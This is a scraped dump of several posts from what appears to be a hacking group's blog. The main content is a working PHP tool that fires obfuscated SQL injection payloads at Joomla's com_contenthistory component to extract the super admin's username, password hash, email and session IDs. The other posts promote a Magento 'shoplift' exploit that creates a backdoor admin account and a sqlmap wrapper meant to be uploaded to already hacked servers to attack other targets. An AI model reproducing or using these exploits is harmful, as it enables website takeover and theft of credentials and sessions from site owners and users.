<table width="100%" cellspacing="0" cellpadding="0" class="tb1" ><br />
<br />
<br />
<br />
<td width="100%" align=center valign="top" rowspan="1"><br />
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu, Joomla </font><font color=white size=5 face="comic sans ms"><b>SQL Injection exploiter By Team </font><font color=green size=5 face="comic sans ms"><b> INDIShEll]]==--</font> <div class="hedr"> <br />
<br />
<td height="10" align="left" class="td1"></td></tr><tr><td <br />
width="100%" align="center" valign="top" rowspan="1"><font <br />
color="red" face="comic sans ms"size="1"><b> <br />
<font color=#ff9933> <br />
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white><br />
-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br><br />
<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Gujjar PCP,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti) <br><br />
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font><br />
<b> <br />
<font color=#ff9933> <br />
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br />
<br />
</table><br />
</table> <br><br />
<br />
';<br />
?><br />
<div align=center><br />
Special Thanks to MakMan (For SQL Injection Query)<br><br />
<form method=post><br />
<input type=input name=in value="http://falana-dhimka.com/"><br />
<input type=submit name=sm value="Start Exploitation"><br />
<br />
<?php<br />
function data($lu)<br />
{<br />
$ch = curl_init();<br />
<br />
curl_setopt($ch, CURLOPT_URL, $lu);<br />
curl_setopt($ch, CURLOPT_HEADER, 0);<br />
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);<br />
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);<br />
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');<br />
$result['EXE'] = curl_exec($ch);<br />
curl_close($ch);<br />
return $result['EXE'];<br />
<br />
<br />
}<br />
<br />
<br />
<br />
<br />
if(isset($_POST['sm']))<br />
{<br />
$firstq="(/*!32100select*/+1+/*!32100from*/+(/*!32100select*/+/*!32100count(*)*/,+/*!32100conCat((/*!32100select*/+(/*!32100select*/+/*!32100conCat(0x7e7e,password,0x7e7e)*/)+/*!32100from*/+/*!32100icalab_users*/+/*!32100where*/+/*!32100name*/=0x53757065722055736572+LIMIT+0,1),floor(rand(0)*2))tu+/*!32100from*/+/*!32100information_schema*/.tables+/*!32100group*/+/*!32100by*/+tu)p)";<br />
$tar=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=".$firstq;<br />
<br />
$dat=data($tar); <br />
$ar0=explode("LEFT JOIN", $dat);<br />
$ar1=explode("_users", $ar0[1]);<br />
$ar=trim($ar1[0]);<br />
<br />
$mainq="polygon((/*!00000select*/*/*!00000from*/(/*!00000select*/*/*!00000from*/(/*!00000select*/concat_ws(0x7e7e,(/*!00000select*/concat_ws(0x7e7e,0x6963616c6162,username,password,email)+/*!00000from*/+icalab_users+order+by+id+ASC+limit+0,1),(/*!00000select*/concat_ws(0x7e,session_id,0x6963616c6162)+/*!00000from*/+icalab_session+order+by+time+DESC+limit+0,1))as+t)``)``))";<br />
<br />
$tarfinal=str_replace($firstq,$mainq,$tar);<br />
<br />
$rt=str_replace("icalab",$ar,$tarfinal);<br />
<br />
$tr=data($rt);<br />
$ar0=explode("icalab", $tr);<br />
$ar0[1];<br />
<br />
<br />
if($ar0[1]!='')<br />
{<br />
$all=array_filter(explode("~~",$ar0[1]));<br />
//print_r($all);die();<br />
<br />
echo "<br> Target gone 8-)<br><br>website name:- ".trim($_POST['in'])." <br>-------------------------------<br> <br>";<br />
echo "website super admin username is --> ".$all[1]." <br>Password Hash is --> ".$all[2]."<br>E-mail id -> ".$all[3];<br />
<br />
echo "<br>-------------------------------<br><br>Super Admin session ID is<br>";<br />
$sessionid=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=updatexml(1,/*!31221conCat(0x7e7e,(/*!23121select*/+session_id+/*!23121from*/+".$ar."_session+/*!32312where*/+/*!32312username*/='".$all[1]."'+limit+0,1),0x7e7e),0)";<br />
<br />
<br />
<br />
$ses=data($sessionid);<br />
$ar0=explode("~~", $ses);<br />
//print_r($ar0);<br />
echo trim($ar0[1]);<br />
<br />
echo "<br>Other user session ID is<br>";<br />
$sessionid=trim($_POST['in'])."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=updatexml(1,/*!31221conCat(0x7e7e,(/*!23121select*/+session_id+/*!23121from*/+".$ar."_session+limit+0,1),0x7e7e),0)";<br />
<br />
$ses=data($sessionid);<br />
$ar0=explode("~~", $ses);<br />
//print_r($ar0);<br />
echo trim($ar0[1]);<br />
}<br />
}<br />
<br />
?><br />
<br />
<br />
/////////////////////////////// code ends here<br />
<br />
With Love from<br />
Team Indishell</div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-69202537393989106992015-08-25T22:24:00.000+05:302015-08-25T22:29:22.399+05:30Magento shoplift exploit python script (SUPEE-5344)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGmSp1lD9GtbQgYZff5Vq7MgeBunPc7bRDErvRYpgAzQs-F-7LlYz66oJ4njH6_4BIySVywA-zFipZTvS5Qix3boELN7bp9Cx9zODsIz0dM-aRZ1-iu0liexdDlPlPOfBEi36ycZVo0Ww/s1600/magento.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGmSp1lD9GtbQgYZff5Vq7MgeBunPc7bRDErvRYpgAzQs-F-7LlYz66oJ4njH6_4BIySVywA-zFipZTvS5Qix3boELN7bp9Cx9zODsIz0dM-aRZ1-iu0liexdDlPlPOfBEi36ycZVo0Ww/s1600/magento.png" /></a></div>
<div style="text-align: center;">
<br /></div>
Hello all,<br />
Here is Magento shoplift exploit python script<br />
it creates admin account if magento installation is vulnerable .<br />
just put target website link (ine number 7 --> <span class="Apple-style-span" style="border-collapse: collapse; color: #333333; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 12px; line-height: 16px; white-space: pre;">target <span class="pl-k" style="color: #a71d5d;">=</span> <span class="pl-s" style="color: #183691;"><span class="pl-pds" style="color: #183691;">"</span>http://target.com/<span class="pl-pds" style="color: #183691;">"</span></span></span>)<br />
admin credential will be<br />
username forme<br />
password forme<br />
<a href="https://github.com/incredibleindishell/Magento-shoplift-python-exploit/blob/master/shoplift.py">https://github.com/incredibleindishell/Magento-shoplift-python-exploit/blob/master/shoplift.py</a><br />
its not developed by me but i just debugged it and made it working<br />
<br />
<br />
<br />
--==[[ Greetz To ]]==--<br />
############################################################################################<br />
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,<br />
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,<br />
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,<br />
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash<br />
#############################################################################################<br />
--==[[Love to]]==--<br />
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,<br />
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)<br />
--==[[ Special Fuck goes to ]]==--<br />
<3 suriya Cyber Tyson <3</div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com1tag:blogger.com,1999:blog-6893238704654067208.post-76846583178879820232015-08-17T01:33:00.001+05:302015-08-17T01:34:12.858+05:30SQL_Inj3cT0r by Incredible<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<h3 style="text-align: left;">
<span style="font-size: large;">Description:</span></h3>
<div style="text-align: left;">
<br />
Basically SQL_Injector is a php script integrated with ‘Sqlmap’ and uses working functionality of ‘Sql map’.<br />
A worthy thing for those guys who use mobile phone internet . :P<br />
If you already have hacked server, just upload the script on that server. and sqlmap will use bandwidth of website for exploitation :D , means you can use bandwidth of the server in order to inject your target.</div>
<br />
You can download the script from here ” https://github.com/incredibleindishell/Panda-sql-injector/blob/master/SQL-Injector%20v1.php”<br />
<br />
NOTE: If the server has set to ‘ safe_mode on ‘ the script will not going to work. You need to set safe_mode to off. In order to do this you can try with ‘ php.ini ’<br />
<br />
<h3 style="text-align: left;">
How to use it ????</h3>
<div style="text-align: left;">
Okay, using ‘SQL_Injector’ includes few and very simple steps, as follows :<br />
1.As mentioned above ‘SQL_Injector ’ is integrated with ‘Sqlmap’, you need to provide path or location of ‘Sqlmap’ on your system. If you don’t have ‘sqlmap’ no need to worry, ‘SQL_Injector’ has functionality to download ‘Sqlmap’. You can refer follower snapshot :</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicaMhjXzlnoUvRdZ6o4aVRHNvR5KVIY__tTzcET9pMM9jqOQR37B5pNA_5aNUwE5ZLURstTZ8IeoZvAfkXAZqaGeqRZ3GV0lL9VCj0yBruJIbFreg33m33zSFUYZxYG-mwxsx6_fqT2Mw/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicaMhjXzlnoUvRdZ6o4aVRHNvR5KVIY__tTzcET9pMM9jqOQR37B5pNA_5aNUwE5ZLURstTZ8IeoZvAfkXAZqaGeqRZ3GV0lL9VCj0yBruJIbFreg33m33zSFUYZxYG-mwxsx6_fqT2Mw/s1600/1.png" /></a></div>
<div style="text-align: left;">
<br />
<br />
If you already have sqlmap then set location of sqlmap.py script. You can refer snapshot: </div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9Q5_S3OmWEArADqVBcrJMnTFwxoukenWhCqlnGfEOlqaZSNKbqbqU0bZR9TZnkIQZ8_Y79ljBcjutizLR72qytrqUO0cM9ajcQHkHuGjLzAKT2AUvNKekp3MzyVX0zxbwhxzHixPqFNk/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9Q5_S3OmWEArADqVBcrJMnTFwxoukenWhCqlnGfEOlqaZSNKbqbqU0bZR9TZnkIQZ8_Y79ljBcjutizLR72qytrqUO0cM9ajcQHkHuGjLzAKT2AUvNKekp3MzyVX0zxbwhxzHixPqFNk/s1600/2.png" /></a></div>
<div style="text-align: left;">
<br />
<br />
2.Next step is to provide vulnerable URL to ‘SQL_Injector’. <br />
Suppose your target URL is “ website.com/page.php?parameter=something ” . Just paste this vulnerable URL in the ‘injectable url’ section and hit ‘extract databases’ button.<br />
I am performing it on my localhost for demonstration. Following snapshot can be taken as reference:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pSwHIGHq58l9PaUxV0IoObZq7xAm4vmbj2Hn4JgDRN7ZCSOKCs558AhdqCoBGKi7gL1sKbAnhyNePZhZfRK1ZKHcK0cD9pRYWDlcNS_sS1LzQSCHj8let6DX5mJXpxXcDKDEoV1ZKMo/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pSwHIGHq58l9PaUxV0IoObZq7xAm4vmbj2Hn4JgDRN7ZCSOKCs558AhdqCoBGKi7gL1sKbAnhyNePZhZfRK1ZKHcK0cD9pRYWDlcNS_sS1LzQSCHj8let6DX5mJXpxXcDKDEoV1ZKMo/s1600/4.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<br />
<span id="goog_1057028698"></span><span id="goog_1057028699"></span><br />
In next few moments you will get the results in a text area which will be the names of present databases on the server. Check out the snapshot :</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimejdyPN-Vu2sezcPiezuGMzJ0NTEQfgT5eJl0_jeUKoozsQZM5eUr64m7pp55FQuXZDXQJUCxRI3kj03ZzuLszpd2v4JebJzomf39JtA5oOaGuxiPYrMCbOjF6rClw_eul2-PEIMlXjU/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimejdyPN-Vu2sezcPiezuGMzJ0NTEQfgT5eJl0_jeUKoozsQZM5eUr64m7pp55FQuXZDXQJUCxRI3kj03ZzuLszpd2v4JebJzomf39JtA5oOaGuxiPYrMCbOjF6rClw_eul2-PEIMlXjU/s1600/5.png" /></a></div>
<div style="text-align: left;">
<br />
3. Next step is to extract tables present in the selected database . Enter ‘database’ name of which you want to extract all the tables and hit ‘extract tables’. In my case will proceed with database named “security”.</div>
<div style="text-align: left;">
Refer following snapshot:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGwHAQwz_Q8YOfKpx-vMmN1cr7axi7kahYXiW7dYqZ-UBK_H1nIkziIknADJpywW1mBN2YGAIJzIL7di_0hSLhxvJ4bvOuLL5GN-m75yCQOLctUTNXI5QY4Th7Jh4Rle7O_mv9iFlSKGM/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGwHAQwz_Q8YOfKpx-vMmN1cr7axi7kahYXiW7dYqZ-UBK_H1nIkziIknADJpywW1mBN2YGAIJzIL7di_0hSLhxvJ4bvOuLL5GN-m75yCQOLctUTNXI5QY4Th7Jh4Rle7O_mv9iFlSKGM/s1600/6.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY2gq4TRt4FPo-UWkMtY8RoRepO_40qAXa76pbIpQC_Syg7Ro3pHfQHgbeWieCoW2Sm2ibBebbhwa2VSadMD1NFqMS0CzCxExKILRGcmw9bB2NPCwEJaUcK5pt1kS11ZExW_m-nkTQPzw/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div style="text-align: left;">
<br />
In next few moments you will get the name of all the tables present within the database. Eg:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY2gq4TRt4FPo-UWkMtY8RoRepO_40qAXa76pbIpQC_Syg7Ro3pHfQHgbeWieCoW2Sm2ibBebbhwa2VSadMD1NFqMS0CzCxExKILRGcmw9bB2NPCwEJaUcK5pt1kS11ZExW_m-nkTQPzw/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY2gq4TRt4FPo-UWkMtY8RoRepO_40qAXa76pbIpQC_Syg7Ro3pHfQHgbeWieCoW2Sm2ibBebbhwa2VSadMD1NFqMS0CzCxExKILRGcmw9bB2NPCwEJaUcK5pt1kS11ZExW_m-nkTQPzw/s1600/7.png" /></a></div>
<div style="text-align: left;">
<br />
<br />
4.In next step we will exploit for columns. Choose any table from the list and proceed for columns of that table. Enter the name of column in ‘extract columns ’ section. I will proceed with table 'users'.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFebMbUO05r9b0IpLKwmivm2QcvlaPnzWr3eo6_4hLvEqE8Z7MYjS-1Wua9qBFDVJf20o-_Wn3YWvFbkYHO5YZF_eH9cyTJJAmdk2SrmBV3CD913reAemnIQpQuNFBODoIJlUyxOawBSU/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFebMbUO05r9b0IpLKwmivm2QcvlaPnzWr3eo6_4hLvEqE8Z7MYjS-1Wua9qBFDVJf20o-_Wn3YWvFbkYHO5YZF_eH9cyTJJAmdk2SrmBV3CD913reAemnIQpQuNFBODoIJlUyxOawBSU/s1600/8.png" /></a></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<br />
After some time you will get all the columns name from entered table.</div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIHoi92m98tmcLK0aOL8HWA1vNtUgyCiNsLAFuhnvJFUv6GSuV4qKzvWVsxgYlA-fqBQHq5oEqSLq_JsNqZ89H3doqrmHhz0_j6UtZvJ1KPIDLCaVFg6FDzHl37-AvYVb9VENLRpgVLgw/s1600/9.png" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<div style="text-align: left;">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIHoi92m98tmcLK0aOL8HWA1vNtUgyCiNsLAFuhnvJFUv6GSuV4qKzvWVsxgYlA-fqBQHq5oEqSLq_JsNqZ89H3doqrmHhz0_j6UtZvJ1KPIDLCaVFg6FDzHl37-AvYVb9VENLRpgVLgw/s1600/9.png" /><br />
<br />
<br />
5.Now its time to dump the data from columns. You can extract data from columns either one by one or all the data at once. Simply enter the names of columns, separating them with a comma ( , ) for multiple column data.<br />
Refer following snapshot :</div>
<div style="text-align: left;">
<br />
(i) For single column data, enter any column name in 'column name' section and hit ' Extract data' button. I will go with column 'username'. Checkout next snapshot for refenence:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span id="goog_1057028755"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_ePdPHDhLNlkmxjU1MSiGShG4x7L7cgMoe_3xeg8617LFIpFYImWpfRlApjBYbJMbOd4uj8cUG2IvvuuDFRoBDE6WeFrH7Y0CtjYA1jyTfYgX37s6luQ4gY-cUAxaQ_zoSeuPfxnCLlE/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_ePdPHDhLNlkmxjU1MSiGShG4x7L7cgMoe_3xeg8617LFIpFYImWpfRlApjBYbJMbOd4uj8cUG2IvvuuDFRoBDE6WeFrH7Y0CtjYA1jyTfYgX37s6luQ4gY-cUAxaQ_zoSeuPfxnCLlE/s1600/10.png" /></a></div>
<span id="goog_1057028754"></span><br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
SQL_Injector result for column 'username' will show in a text area as shown on the screen : </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOxOMoOaf-G_r-3IzeRBen-Evx-qhGl2UvPlOfhmcUQDMLtYxQJiTUQzkiFjq-9o_w2dvdhmHtkLrGunXg1tzk6LRJsxGFA-igaBrT90ypSqeDpaRBuCO4suizXCpIDDhJXJeu0yIfY_s/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOxOMoOaf-G_r-3IzeRBen-Evx-qhGl2UvPlOfhmcUQDMLtYxQJiTUQzkiFjq-9o_w2dvdhmHtkLrGunXg1tzk6LRJsxGFA-igaBrT90ypSqeDpaRBuCO4suizXCpIDDhJXJeu0yIfY_s/s1600/11.png" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<br />
(ii) For multiple column data, enter column names as given in the following image: <span id="goog_1057028779"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI651diYbMs2nuDC13nRT98gYwCSUeqry8ywObjWBKC_gVd7blcVbAZZ1zqyzcQZp9ap1kCJ5bSU1_6sRquO6IhNwvhiWnCSeaplrZAG7jspbuOwpwoiO2tLfL2aUbLmFfUwOmtJ88x44/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI651diYbMs2nuDC13nRT98gYwCSUeqry8ywObjWBKC_gVd7blcVbAZZ1zqyzcQZp9ap1kCJ5bSU1_6sRquO6IhNwvhiWnCSeaplrZAG7jspbuOwpwoiO2tLfL2aUbLmFfUwOmtJ88x44/s1600/12.png" /></a></div>
<span id="goog_1057028778"></span><br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Result for all the columns will something like shown in next image:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDWC1Ka6bCusDytBrzxuKl8XbvIzYXWOIiwA4qTi3ybyabUzPHphBoWw6FSrxSRpCQUlHw1oyY6DjnXUBC8UO288mvlp1zkDAhcGNzLVmJUWmGePpDP5MevK9N1x07WOCgQFUrpXjUVS8/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDWC1Ka6bCusDytBrzxuKl8XbvIzYXWOIiwA4qTi3ybyabUzPHphBoWw6FSrxSRpCQUlHw1oyY6DjnXUBC8UO288mvlp1zkDAhcGNzLVmJUWmGePpDP5MevK9N1x07WOCgQFUrpXjUVS8/s1600/13.png" /></a></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<br />
<br />
So… this is SQL_Injector version-1, with basic functionality. I am working on it to add more features. I will release version-2 very soon.. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJiwFxjCwBfg1Lc2t-3y5J_kvrucKesPqeK8SDaSdBjOUwJHnL5_qWUelg4-UpwWCsoAGYXq_ij8zejLBi-YlsChajXP8NL8OJQgfpZsNo30ECJfOiKFtUZLFhOChNJm1sbFQfamTuxFw/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<br /></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0